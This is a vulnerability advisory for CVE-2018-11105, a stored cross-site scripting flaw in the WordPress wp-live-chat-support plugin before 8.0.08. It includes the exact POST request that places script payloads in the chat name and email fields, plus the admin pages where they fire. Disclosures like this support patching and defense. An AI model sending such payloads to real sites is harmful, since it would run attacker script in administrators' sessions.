CVE-2018-11105
[Suggested description]
There is stored cross site scripting in the wp-live-chat-support plugin before 8.0.08 for
WordPress via the "name" (aka wplc_name) and "email" (aka wplc_email) input fields
whenever a malicious attacker would initiate a new chat with an
administrator.
NOTE: this issue exists because of an incomplete fix for CVE-2018-9864.
[Additional Information]
The following POST request was used for leveraging the XSS attack:
```
POST /wp-json/wp_live_chat_support/v1/start_chat HTTP/1.1
...
header info
...
Connection: close
relay_action=wplc_new_chat&
security=<token&
cid=<cid&
wplc_name=<scriptalert("evil payload in name");</script&
wplc_email=<scriptalert("evil payload in mail");</script&
wplc_extra_data%5Bobject_switch%5D=1&
url=http%3A%2F%2Flocalhost%3A8000%2F&
session=<session&
server_token=<token&
token=<token&_wpnonce=<nonce
```
Notice that the wplc_name and wplc_email were effectively used to deliver the payload to the WordPress backend.
[Vulnerability Type]
Cross Site Scripting (XSS)
[Vendor of Product]
CodeCabin_ / WP-livechat
[Affected Product Code Base]
WP live chat support - All versions < 8.0.08
[Affected Component]
WP live chat support - all versions < 8.0.08
[Attack Type]
Remote
[CVE Impact Other]
Stored Cross Site Scripting
[Attack Vectors]
A malicious attacker that initiates a chat with an administrator can
abuse the "name" and "email" form fields that are presented by the
wp-live-chat plugin to inject malicious javascript. After the chat is
either ended or missed by the administrator interaction with the
following pages will trigger the malicious javascript:
http://<target-url/wp-admin/admin.php?page=wplivechat-menu-history
http://<target-url/wp-admin/admin.php?page=wplivechat-menu&action=history&cid=<infected-chat-id
http://<target-url/wp-admin/admin.php?page=wplivechat-menu-missed-chats
http://<target-url/wp-admin/admin.php?page=wplivechat-menu&action=history&cid=<infected-chat-id
[Has vendor confirmed or acknowledged the vulnerability?]
true
[Discoverer]
Riccardo ten Cate
[Reference]
https://github.com/RiieCco/write-ups/tree/master/CVE-2018-11105